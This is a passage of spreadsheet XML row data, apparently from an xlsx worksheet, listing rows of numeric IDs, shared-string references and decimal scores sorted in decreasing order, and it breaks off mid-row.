    <row r="5481" ht="15.75" customHeight="1">
      <c r="A5481" s="1">
        <v>22196.0</v>
      </c>
      <c r="B5481" s="2">
        <v>3.1878333E7</v>
      </c>
      <c r="C5481" s="2" t="s">
        <v>5232</v>
      </c>
      <c r="D5481" s="2">
        <v>1.0</v>
      </c>
      <c r="E5481" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5481" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="5482" ht="15.75" customHeight="1">
      <c r="A5482" s="1">
        <v>23595.0</v>
      </c>
      <c r="B5482" s="2">
        <v>6367788.0</v>
      </c>
      <c r="C5482" s="2" t="s">
        <v>5233</v>
      </c>
      <c r="D5482" s="2">
        <v>1.0</v>
      </c>
      <c r="E5482" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5482" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="5483" ht="15.75" customHeight="1">
      <c r="A5483" s="1">
        <v>29387.0</v>
      </c>
      <c r="B5483" s="2">
        <v>3.1878332E7</v>
      </c>
      <c r="C5483" s="2" t="s">
        <v>5232</v>
      </c>
      <c r="D5483" s="2">
        <v>1.0</v>
      </c>
      <c r="E5483" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5483" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="5484" ht="15.75" customHeight="1">
      <c r="A5484" s="1">
        <v>32965.0</v>
      </c>
      <c r="B5484" s="2">
        <v>6546493.0</v>
      </c>
      <c r="C5484" s="2" t="s">
        <v>5234</v>
      </c>
      <c r="D5484" s="2">
        <v>1.0</v>
      </c>
      <c r="E5484" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5484" s="2">
        <v>0.1527777777777778</v>
      </c>
    </row>
    <row r="5485" ht="15.75" customHeight="1">
      <c r="A5485" s="1">
        <v>26255.0</v>
      </c>
      <c r="B5485" s="2">
        <v>1.6339952E7</v>
      </c>
      <c r="C5485" s="2" t="s">
        <v>5235</v>
      </c>
      <c r="D5485" s="2">
        <v>1.0</v>
      </c>
      <c r="E5485" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5485" s="2">
        <v>0.1526019690576653</v>
      </c>
    </row>
    <row r="5486" ht="15.75" customHeight="1">
      <c r="A5486" s="1">
        <v>30565.0</v>
      </c>
      <c r="B5486" s="2">
        <v>4.0894928E7</v>
      </c>
      <c r="C5486" s="2" t="s">
        <v>5236</v>
      </c>
      <c r="D5486" s="2">
        <v>1.0</v>
      </c>
      <c r="E5486" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5486" s="2">
        <v>0.1523569023569024</v>
      </c>
    </row>
    <row r="5487" ht="15.75" customHeight="1">
      <c r="A5487" s="1">
        <v>26980.0</v>
      </c>
      <c r="B5487" s="2">
        <v>1.9732391E7</v>
      </c>
      <c r="C5487" s="2" t="s">
        <v>5237</v>
      </c>
      <c r="D5487" s="2">
        <v>1.0</v>
      </c>
      <c r="E5487" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5487" s="2">
        <v>0.1522988505747127</v>
      </c>
    </row>
    <row r="5488" ht="15.75" customHeight="1">
      <c r="A5488" s="1">
        <v>26046.0</v>
      </c>
      <c r="B5488" s="2">
        <v>1.5480661E7</v>
      </c>
      <c r="C5488" s="2" t="s">
        <v>5238</v>
      </c>
      <c r="D5488" s="2">
        <v>1.0</v>
      </c>
      <c r="E5488" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5488" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="5489" ht="15.75" customHeight="1">
      <c r="A5489" s="1">
        <v>33951.0</v>
      </c>
      <c r="B5489" s="2">
        <v>9299843.0</v>
      </c>
      <c r="C5489" s="2" t="s">
        <v>5239</v>
      </c>
      <c r="D5489" s="2">
        <v>1.0</v>
      </c>
      <c r="E5489" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5489" s="2">
        <v>0.1520947176684882</v>
      </c>
    </row>
    <row r="5490" ht="15.75" customHeight="1">
      <c r="A5490" s="1">
        <v>20261.0</v>
      </c>
      <c r="B5490" s="2">
        <v>1.105135E7</v>
      </c>
      <c r="C5490" s="2" t="s">
        <v>5240</v>
      </c>
      <c r="D5490" s="2">
        <v>1.0</v>
      </c>
      <c r="E5490" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5490" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="5491" ht="15.75" customHeight="1">
      <c r="A5491" s="1">
        <v>21309.0</v>
      </c>
      <c r="B5491" s="2">
        <v>2.077502E7</v>
      </c>
      <c r="C5491" s="2" t="s">
        <v>5241</v>
      </c>
      <c r="D5491" s="2">
        <v>1.0</v>
      </c>
      <c r="E5491" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5491" s="2">
        <v>0.1516007532956686</v>
      </c>
    </row>
    <row r="5492" ht="15.75" customHeight="1">
      <c r="A5492" s="1">
        <v>29690.0</v>
      </c>
      <c r="B5492" s="2">
        <v>3.4170845E7</v>
      </c>
      <c r="C5492" s="2" t="s">
        <v>5242</v>
      </c>
      <c r="D5492" s="2">
        <v>1.0</v>
      </c>
      <c r="E5492" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5492" s="2">
        <v>0.1514336917562725</v>
      </c>
    </row>
    <row r="5493" ht="15.75" customHeight="1">
      <c r="A5493" s="1">
        <v>29318.0</v>
      </c>
      <c r="B5493" s="2">
        <v>3.1312423E7</v>
      </c>
      <c r="C5493" s="2" t="s">
        <v>5243</v>
      </c>
      <c r="D5493" s="2">
        <v>1.0</v>
      </c>
      <c r="E5493" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5493" s="2">
        <v>0.1513409961685824</v>
      </c>
    </row>
    <row r="5494" ht="15.75" customHeight="1">
      <c r="A5494" s="1">
        <v>21284.0</v>
      </c>
      <c r="B5494" s="2">
        <v>2.0429478E7</v>
      </c>
      <c r="C5494" s="2" t="s">
        <v>5244</v>
      </c>
      <c r="D5494" s="2">
        <v>1.0</v>
      </c>
      <c r="E5494" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5494" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="5495" ht="15.75" customHeight="1">
      <c r="A5495" s="1">
        <v>21817.0</v>
      </c>
      <c r="B5495" s="2">
        <v>2.6905023E7</v>
      </c>
      <c r="C5495" s="2" t="s">
        <v>5245</v>
      </c>
      <c r="D5495" s="2">
        <v>1.0</v>
      </c>
      <c r="E5495" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5495" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="5496" ht="15.75" customHeight="1">
      <c r="A5496" s="1">
        <v>28561.0</v>
      </c>
      <c r="B5496" s="2">
        <v>2.6905022E7</v>
      </c>
      <c r="C5496" s="2" t="s">
        <v>5245</v>
      </c>
      <c r="D5496" s="2">
        <v>1.0</v>
      </c>
      <c r="E5496" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5496" s="2">
        <v>0.1512345679012346</v>
      </c>
    </row>
    <row r="5497" ht="15.75" customHeight="1">
      <c r="A5497" s="1">
        <v>21279.0</v>
      </c>
      <c r="B5497" s="2">
        <v>2.0309046E7</v>
      </c>
      <c r="C5497" s="2" t="s">
        <v>5185</v>
      </c>
      <c r="D5497" s="2">
        <v>1.0</v>
      </c>
      <c r="E5497" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5497" s="2">
        <v>0.1510721247563354</v>
      </c>
    </row>
    <row r="5498" ht="15.75" customHeight="1">
      <c r="A5498" s="1">
        <v>23667.0</v>
      </c>
      <c r="B5498" s="2">
        <v>6873140.0</v>
      </c>
      <c r="C5498" s="2" t="s">
        <v>5246</v>
      </c>
      <c r="D5498" s="2">
        <v>1.0</v>
      </c>
      <c r="E5498" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5498" s="2">
        <v>0.1510172143974961</v>
      </c>
    </row>
    <row r="5499" ht="15.75" customHeight="1">
      <c r="A5499" s="1">
        <v>22179.0</v>
      </c>
      <c r="B5499" s="2">
        <v>3.1704098E7</v>
      </c>
      <c r="C5499" s="2" t="s">
        <v>5247</v>
      </c>
      <c r="D5499" s="2">
        <v>1.0</v>
      </c>
      <c r="E5499" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5499" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="5500" ht="15.75" customHeight="1">
      <c r="A5500" s="1">
        <v>24033.0</v>
      </c>
      <c r="B5500" s="2">
        <v>9448565.0</v>
      </c>
      <c r="C5500" s="2" t="s">
        <v>5248</v>
      </c>
      <c r="D5500" s="2">
        <v>1.0</v>
      </c>
      <c r="E5500" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5500" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="5501" ht="15.75" customHeight="1">
      <c r="A5501" s="1">
        <v>26320.0</v>
      </c>
      <c r="B5501" s="2">
        <v>1.6663825E7</v>
      </c>
      <c r="C5501" s="2" t="s">
        <v>5249</v>
      </c>
      <c r="D5501" s="2">
        <v>1.0</v>
      </c>
      <c r="E5501" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5501" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="5502" ht="15.75" customHeight="1">
      <c r="A5502" s="1">
        <v>27845.0</v>
      </c>
      <c r="B5502" s="2">
        <v>2.3424108E7</v>
      </c>
      <c r="C5502" s="2" t="s">
        <v>5250</v>
      </c>
      <c r="D5502" s="2">
        <v>1.0</v>
      </c>
      <c r="E5502" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5502" s="2">
        <v>0.150925925925926</v>
      </c>
    </row>
    <row r="5503" ht="15.75" customHeight="1">
      <c r="A5503" s="1">
        <v>27990.0</v>
      </c>
      <c r="B5503" s="2">
        <v>2.4072092E7</v>
      </c>
      <c r="C5503" s="2" t="s">
        <v>5251</v>
      </c>
      <c r="D5503" s="2">
        <v>1.0</v>
      </c>
      <c r="E5503" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5503" s="2">
        <v>0.150900900900901</v>
      </c>
    </row>
    <row r="5504" ht="15.75" customHeight="1">
      <c r="A5504" s="1">
        <v>31300.0</v>
      </c>
      <c r="B5504" s="2">
        <v>4967863.0</v>
      </c>
      <c r="C5504" s="2" t="s">
        <v>5252</v>
      </c>
      <c r="D5504" s="2">
        <v>1.0</v>
      </c>
      <c r="E5504" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5504" s="2">
        <v>0.1507936507936509</v>
      </c>
    </row>
    <row r="5505" ht="15.75" customHeight="1">
      <c r="A5505" s="1">
        <v>28136.0</v>
      </c>
      <c r="B5505" s="2">
        <v>2.4786324E7</v>
      </c>
      <c r="C5505" s="2" t="s">
        <v>5253</v>
      </c>
      <c r="D5505" s="2">
        <v>1.0</v>
      </c>
      <c r="E5505" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5505" s="2">
        <v>0.1507936507936508</v>
      </c>
    </row>
    <row r="5506" ht="15.75" customHeight="1">
      <c r="A5506" s="1">
        <v>26051.0</v>
      </c>
      <c r="B5506" s="2">
        <v>1.5513514E7</v>
      </c>
      <c r="C5506" s="2" t="s">
        <v>5254</v>
      </c>
      <c r="D5506" s="2">
        <v>1.0</v>
      </c>
      <c r="E5506" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5506" s="2">
        <v>0.1506734006734007</v>
      </c>
    </row>
    <row r="5507" ht="15.75" customHeight="1">
      <c r="A5507" s="1">
        <v>31611.0</v>
      </c>
      <c r="B5507" s="2">
        <v>5143272.0</v>
      </c>
      <c r="C5507" s="2" t="s">
        <v>5255</v>
      </c>
      <c r="D5507" s="2">
        <v>1.0</v>
      </c>
      <c r="E5507" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5507" s="2">
        <v>0.150462962962963</v>
      </c>
    </row>
    <row r="5508" ht="15.75" customHeight="1">
      <c r="A5508" s="1">
        <v>21238.0</v>
      </c>
      <c r="B5508" s="2">
        <v>1.9732392E7</v>
      </c>
      <c r="C5508" s="2" t="s">
        <v>5256</v>
      </c>
      <c r="D5508" s="2">
        <v>1.0</v>
      </c>
      <c r="E5508" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5508" s="2">
        <v>0.1503831417624522</v>
      </c>
    </row>
    <row r="5509" ht="15.75" customHeight="1">
      <c r="A5509" s="1">
        <v>32739.0</v>
      </c>
      <c r="B5509" s="2">
        <v>6026512.0</v>
      </c>
      <c r="C5509" s="2" t="s">
        <v>5213</v>
      </c>
      <c r="D5509" s="2">
        <v>1.0</v>
      </c>
      <c r="E5509" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5509" s="2">
        <v>0.1503831417624521</v>
      </c>
    </row>
    <row r="5510" ht="15.75" customHeight="1">
      <c r="A5510" s="1">
        <v>21839.0</v>
      </c>
      <c r="B5510" s="2">
        <v>2.7103551E7</v>
      </c>
      <c r="C5510" s="2" t="s">
        <v>5257</v>
      </c>
      <c r="D5510" s="2">
        <v>1.0</v>
      </c>
      <c r="E5510" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5510" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="5511" ht="15.75" customHeight="1">
      <c r="A5511" s="1">
        <v>26510.0</v>
      </c>
      <c r="B5511" s="2">
        <v>1.7604699E7</v>
      </c>
      <c r="C5511" s="2" t="s">
        <v>5258</v>
      </c>
      <c r="D5511" s="2">
        <v>1.0</v>
      </c>
      <c r="E5511" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5511" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="5512" ht="15.75" customHeight="1">
      <c r="A5512" s="1">
        <v>26765.0</v>
      </c>
      <c r="B5512" s="2">
        <v>1.8468601E7</v>
      </c>
      <c r="C5512" s="2" t="s">
        <v>5259</v>
      </c>
      <c r="D5512" s="2">
        <v>1.0</v>
      </c>
      <c r="E5512" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5512" s="2">
        <v>0.1502732240437159</v>
      </c>
    </row>
    <row r="5513" ht="15.75" customHeight="1">
      <c r="A5513" s="1">
        <v>24684.0</v>
      </c>
      <c r="B5513" s="2">
        <v>1.1607338E7</v>
      </c>
      <c r="C5513" s="2" t="s">
        <v>5260</v>
      </c>
      <c r="D5513" s="2">
        <v>1.0</v>
      </c>
      <c r="E5513" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5513" s="2">
        <v>0.1501736111111112</v>
      </c>
    </row>
    <row r="5514" ht="15.75" customHeight="1">
      <c r="A5514" s="1">
        <v>29702.0</v>
      </c>
      <c r="B5514" s="2">
        <v>3.4366794E7</v>
      </c>
      <c r="C5514" s="2" t="s">
        <v>5261</v>
      </c>
      <c r="D5514" s="2">
        <v>1.0</v>
      </c>
      <c r="E5514" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5514" s="2">
        <v>0.1501736111111112</v>
      </c>
    </row>
    <row r="5515" ht="15.75" customHeight="1">
      <c r="A5515" s="1">
        <v>30328.0</v>
      </c>
      <c r="B5515" s="2">
        <v>3.8108268E7</v>
      </c>
      <c r="C5515" s="2" t="s">
        <v>5262</v>
      </c>
      <c r="D5515" s="2">
        <v>1.0</v>
      </c>
      <c r="E5515" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5515" s="2">
        <v>0.1501736111111112</v>
      </c>
    </row>
    <row r="5516" ht="15.75" customHeight="1">
      <c r="A5516" s="1">
        <v>27721.0</v>
      </c>
      <c r="B5516" s="2">
        <v>2.3062285E7</v>
      </c>
      <c r="C5516" s="2" t="s">
        <v>5263</v>
      </c>
      <c r="D5516" s="2">
        <v>1.0</v>
      </c>
      <c r="E5516" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5516" s="2">
        <v>0.1501322751322752</v>
      </c>
    </row>
    <row r="5517" ht="15.75" customHeight="1">
      <c r="A5517" s="1">
        <v>24486.0</v>
      </c>
      <c r="B5517" s="2">
        <v>1.1051349E7</v>
      </c>
      <c r="C5517" s="2" t="s">
        <v>5240</v>
      </c>
      <c r="D5517" s="2">
        <v>1.0</v>
      </c>
      <c r="E5517" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5517" s="2">
        <v>0.1497175141242938</v>
      </c>
    </row>
    <row r="5518" ht="15.75" customHeight="1">
      <c r="A5518" s="1">
        <v>20919.0</v>
      </c>
      <c r="B5518" s="2">
        <v>1.6377142E7</v>
      </c>
      <c r="C5518" s="2" t="s">
        <v>5264</v>
      </c>
      <c r="D5518" s="2">
        <v>1.0</v>
      </c>
      <c r="E5518" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5518" s="2">
        <v>0.149641577060932</v>
      </c>
    </row>
    <row r="5519" ht="15.75" customHeight="1">
      <c r="A5519" s="1">
        <v>29887.0</v>
      </c>
      <c r="B5519" s="2">
        <v>3607012.0</v>
      </c>
      <c r="C5519" s="2" t="s">
        <v>5265</v>
      </c>
      <c r="D5519" s="2">
        <v>1.0</v>
      </c>
      <c r="E5519" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5519" s="2">
        <v>0.1495726495726496</v>
      </c>
    </row>
    <row r="5520" ht="15.75" customHeight="1">
      <c r="A5520" s="1">
        <v>20652.0</v>
      </c>
      <c r="B5520" s="2">
        <v>1.4270181E7</v>
      </c>
      <c r="C5520" s="2" t="s">
        <v>5266</v>
      </c>
      <c r="D5520" s="2">
        <v>1.0</v>
      </c>
      <c r="E5520" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5520" s="2">
        <v>0.1495098039215687</v>
      </c>
    </row>
    <row r="5521" ht="15.75" customHeight="1">
      <c r="A5521" s="1">
        <v>30202.0</v>
      </c>
      <c r="B5521" s="2">
        <v>3.7299012E7</v>
      </c>
      <c r="C5521" s="2" t="s">
        <v>5267</v>
      </c>
      <c r="D5521" s="2">
        <v>1.0</v>
      </c>
      <c r="E5521" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5521" s="2">
        <v>0.1493055555555556</v>
      </c>
    </row>
    <row r="5522" ht="15.75" customHeight="1">
      <c r="A5522" s="1">
        <v>28993.0</v>
      </c>
      <c r="B5522" s="2">
        <v>2.9863736E7</v>
      </c>
      <c r="C5522" s="2" t="s">
        <v>5268</v>
      </c>
      <c r="D5522" s="2">
        <v>1.0</v>
      </c>
      <c r="E5522" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5522" s="2">
        <v>0.1491228070175439</v>
      </c>
    </row>
    <row r="5523" ht="15.75" customHeight="1">
      <c r="A5523" s="1">
        <v>23485.0</v>
      </c>
      <c r="B5523" s="2">
        <v>5.7355859E7</v>
      </c>
      <c r="C5523" s="2" t="s">
        <v>5269</v>
      </c>
      <c r="D5523" s="2">
        <v>1.0</v>
      </c>
      <c r="E5523" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5523" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="5524" ht="15.75" customHeight="1">
      <c r="A5524" s="1">
        <v>33316.0</v>
      </c>
      <c r="B5524" s="2">
        <v>7524704.0</v>
      </c>
      <c r="C5524" s="2" t="s">
        <v>5270</v>
      </c>
      <c r="D5524" s="2">
        <v>1.0</v>
      </c>
      <c r="E5524" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5524" s="2">
        <v>0.1490740740740741</v>
      </c>
    </row>
    <row r="5525" ht="15.75" customHeight="1">
      <c r="A5525" s="1">
        <v>25859.0</v>
      </c>
      <c r="B5525" s="2">
        <v>1.4878802E7</v>
      </c>
      <c r="C5525" s="2" t="s">
        <v>5271</v>
      </c>
      <c r="D5525" s="2">
        <v>1.0</v>
      </c>
      <c r="E5525" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5525" s="2">
        <v>0.1490299823633158</v>
      </c>
    </row>
    <row r="5526" ht="15.75" customHeight="1">
      <c r="A5526" s="1">
        <v>25507.0</v>
      </c>
      <c r="B5526" s="2">
        <v>1.4143796E7</v>
      </c>
      <c r="C5526" s="2" t="s">
        <v>5272</v>
      </c>
      <c r="D5526" s="2">
        <v>1.0</v>
      </c>
      <c r="E5526" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5526" s="2">
        <v>0.1489533011272142</v>
      </c>
    </row>
    <row r="5527" ht="15.75" customHeight="1">
      <c r="A5527" s="1">
        <v>26464.0</v>
      </c>
      <c r="B5527" s="2">
        <v>1.7339235E7</v>
      </c>
      <c r="C5527" s="2" t="s">
        <v>5273</v>
      </c>
      <c r="D5527" s="2">
        <v>1.0</v>
      </c>
      <c r="E5527" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5527" s="2">
        <v>0.1489197530864198</v>
      </c>
    </row>
    <row r="5528" ht="15.75" customHeight="1">
      <c r="A5528" s="1">
        <v>27117.0</v>
      </c>
      <c r="B5528" s="2">
        <v>2.0660226E7</v>
      </c>
      <c r="C5528" s="2" t="s">
        <v>5274</v>
      </c>
      <c r="D5528" s="2">
        <v>1.0</v>
      </c>
      <c r="E5528" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5528" s="2">
        <v>0.1489197530864198</v>
      </c>
    </row>
    <row r="5529" ht="15.75" customHeight="1">
      <c r="A5529" s="1">
        <v>12244.0</v>
      </c>
      <c r="B5529" s="2">
        <v>2.7886201E7</v>
      </c>
      <c r="C5529" s="2" t="s">
        <v>5275</v>
      </c>
      <c r="D5529" s="2">
        <v>1.0</v>
      </c>
      <c r="E5529" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5529" s="2">
        <v>0.148888888888889</v>
      </c>
    </row>
    <row r="5530" ht="15.75" customHeight="1">
      <c r="A5530" s="1">
        <v>23727.0</v>
      </c>
      <c r="B5530" s="2">
        <v>7235696.0</v>
      </c>
      <c r="C5530" s="2" t="s">
        <v>5276</v>
      </c>
      <c r="D5530" s="2">
        <v>1.0</v>
      </c>
      <c r="E5530" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5530" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="5531" ht="15.75" customHeight="1">
      <c r="A5531" s="1">
        <v>33217.0</v>
      </c>
      <c r="B5531" s="2">
        <v>7235695.0</v>
      </c>
      <c r="C5531" s="2" t="s">
        <v>5276</v>
      </c>
      <c r="D5531" s="2">
        <v>1.0</v>
      </c>
      <c r="E5531" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5531" s="2">
        <v>0.1484848484848485</v>
      </c>
    </row>
    <row r="5532" ht="15.75" customHeight="1">
      <c r="A5532" s="1">
        <v>27031.0</v>
      </c>
      <c r="B5532" s="2">
        <v>2.0143508E7</v>
      </c>
      <c r="C5532" s="2" t="s">
        <v>5277</v>
      </c>
      <c r="D5532" s="2">
        <v>1.0</v>
      </c>
      <c r="E5532" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5532" s="2">
        <v>0.1484517304189436</v>
      </c>
    </row>
    <row r="5533" ht="15.75" customHeight="1">
      <c r="A5533" s="1">
        <v>28909.0</v>
      </c>
      <c r="B5533" s="2">
        <v>2.9427477E7</v>
      </c>
      <c r="C5533" s="2" t="s">
        <v>5278</v>
      </c>
      <c r="D5533" s="2">
        <v>1.0</v>
      </c>
      <c r="E5533" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5533" s="2">
        <v>0.1484126984126985</v>
      </c>
    </row>
    <row r="5534" ht="15.75" customHeight="1">
      <c r="A5534" s="1">
        <v>29789.0</v>
      </c>
      <c r="B5534" s="2">
        <v>3.5022539E7</v>
      </c>
      <c r="C5534" s="2" t="s">
        <v>5279</v>
      </c>
      <c r="D5534" s="2">
        <v>1.0</v>
      </c>
      <c r="E5534" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5534" s="2">
        <v>0.1484126984126984</v>
      </c>
    </row>
    <row r="5535" ht="15.75" customHeight="1">
      <c r="A5535" s="1">
        <v>18939.0</v>
      </c>
      <c r="B5535" s="2">
        <v>5.4314747E7</v>
      </c>
      <c r="C5535" s="2" t="s">
        <v>5280</v>
      </c>
      <c r="D5535" s="2">
        <v>1.0</v>
      </c>
      <c r="E5535" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5535" s="2">
        <v>0.1484018264840183</v>
      </c>
    </row>
    <row r="5536" ht="15.75" customHeight="1">
      <c r="A5536" s="1">
        <v>26870.0</v>
      </c>
      <c r="B5536" s="2">
        <v>1.9089413E7</v>
      </c>
      <c r="C5536" s="2" t="s">
        <v>5281</v>
      </c>
      <c r="D5536" s="2">
        <v>1.0</v>
      </c>
      <c r="E5536" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5536" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="5537" ht="15.75" customHeight="1">
      <c r="A5537" s="1">
        <v>29689.0</v>
      </c>
      <c r="B5537" s="2">
        <v>3.4125831E7</v>
      </c>
      <c r="C5537" s="2" t="s">
        <v>5282</v>
      </c>
      <c r="D5537" s="2">
        <v>1.0</v>
      </c>
      <c r="E5537" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5537" s="2">
        <v>0.1478494623655915</v>
      </c>
    </row>
    <row r="5538" ht="15.75" customHeight="1">
      <c r="A5538" s="1">
        <v>29639.0</v>
      </c>
      <c r="B5538" s="2">
        <v>3.3792726E7</v>
      </c>
      <c r="C5538" s="2" t="s">
        <v>5283</v>
      </c>
      <c r="D5538" s="2">
        <v>1.0</v>
      </c>
      <c r="E5538" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5538" s="2">
        <v>0.1478494623655914</v>
      </c>
    </row>
    <row r="5539" ht="15.75" customHeight="1">
      <c r="A5539" s="1">
        <v>22264.0</v>
      </c>
      <c r="B5539" s="2">
        <v>3.2990164E7</v>
      </c>
      <c r="C5539" s="2" t="s">
        <v>5284</v>
      </c>
      <c r="D5539" s="2">
        <v>1.0</v>
      </c>
      <c r="E5539" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5539" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="5540" ht="15.75" customHeight="1">
      <c r="A5540" s="1">
        <v>28646.0</v>
      </c>
      <c r="B5540" s="2">
        <v>2.7322414E7</v>
      </c>
      <c r="C5540" s="2" t="s">
        <v>5285</v>
      </c>
      <c r="D5540" s="2">
        <v>1.0</v>
      </c>
      <c r="E5540" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5540" s="2">
        <v>0.1478342749529191</v>
      </c>
    </row>
    <row r="5541" ht="15.75" customHeight="1">
      <c r="A5541" s="1">
        <v>25686.0</v>
      </c>
      <c r="B5541" s="2">
        <v>1.4524655E7</v>
      </c>
      <c r="C5541" s="2" t="s">
        <v>5286</v>
      </c>
      <c r="D5541" s="2">
        <v>1.0</v>
      </c>
      <c r="E5541" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5541" s="2">
        <v>0.1473429951690821</v>
      </c>
    </row>
    <row r="5542" ht="15.75" customHeight="1">
      <c r="A5542" s="1">
        <v>32344.0</v>
      </c>
      <c r="B5542" s="2">
        <v>5591800.0</v>
      </c>
      <c r="C5542" s="2" t="s">
        <v>5287</v>
      </c>
      <c r="D5542" s="2">
        <v>1.0</v>
      </c>
      <c r="E5542" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5542" s="2">
        <v>0.1473063973063974</v>
      </c>
    </row>
    <row r="5543" ht="15.75" customHeight="1">
      <c r="A5543" s="1">
        <v>26304.0</v>
      </c>
      <c r="B5543" s="2">
        <v>1.6574585E7</v>
      </c>
      <c r="C5543" s="2" t="s">
        <v>5288</v>
      </c>
      <c r="D5543" s="2">
        <v>1.0</v>
      </c>
      <c r="E5543" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5543" s="2">
        <v>0.1472222222222223</v>
      </c>
    </row>
    <row r="5544" ht="15.75" customHeight="1">
      <c r="A5544" s="1">
        <v>20863.0</v>
      </c>
      <c r="B5544" s="2">
        <v>1.585824E7</v>
      </c>
      <c r="C5544" s="2" t="s">
        <v>5289</v>
      </c>
      <c r="D5544" s="2">
        <v>1.0</v>
      </c>
      <c r="E5544" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5544" s="2">
        <v>0.1472222222222222</v>
      </c>
    </row>
    <row r="5545" ht="15.75" customHeight="1">
      <c r="A5545" s="1">
        <v>23764.0</v>
      </c>
      <c r="B5545" s="2">
        <v>7524705.0</v>
      </c>
      <c r="C5545" s="2" t="s">
        <v>5270</v>
      </c>
      <c r="D5545" s="2">
        <v>1.0</v>
      </c>
      <c r="E5545" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5545" s="2">
        <v>0.1472222222222222</v>
      </c>
    </row>
    <row r="5546" ht="15.75" customHeight="1">
      <c r="A5546" s="1">
        <v>24479.0</v>
      </c>
      <c r="B5546" s="2">
        <v>1.1040266E7</v>
      </c>
      <c r="C5546" s="2" t="s">
        <v>5290</v>
      </c>
      <c r="D5546" s="2">
        <v>1.0</v>
      </c>
      <c r="E5546" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5546" s="2">
        <v>0.147119341563786</v>
      </c>
    </row>
    <row r="5547" ht="15.75" customHeight="1">
      <c r="A5547" s="1">
        <v>20707.0</v>
      </c>
      <c r="B5547" s="2">
        <v>1.4562525E7</v>
      </c>
      <c r="C5547" s="2" t="s">
        <v>5291</v>
      </c>
      <c r="D5547" s="2">
        <v>1.0</v>
      </c>
      <c r="E5547" s="3" t="s">
        <v>4878</v>
      </c>
      <c r="F5547" s="2">
        <v>0.1467013888888889</v>
      </c>
    </row>
    <row r="5548" ht="15.75" customHeight="1">
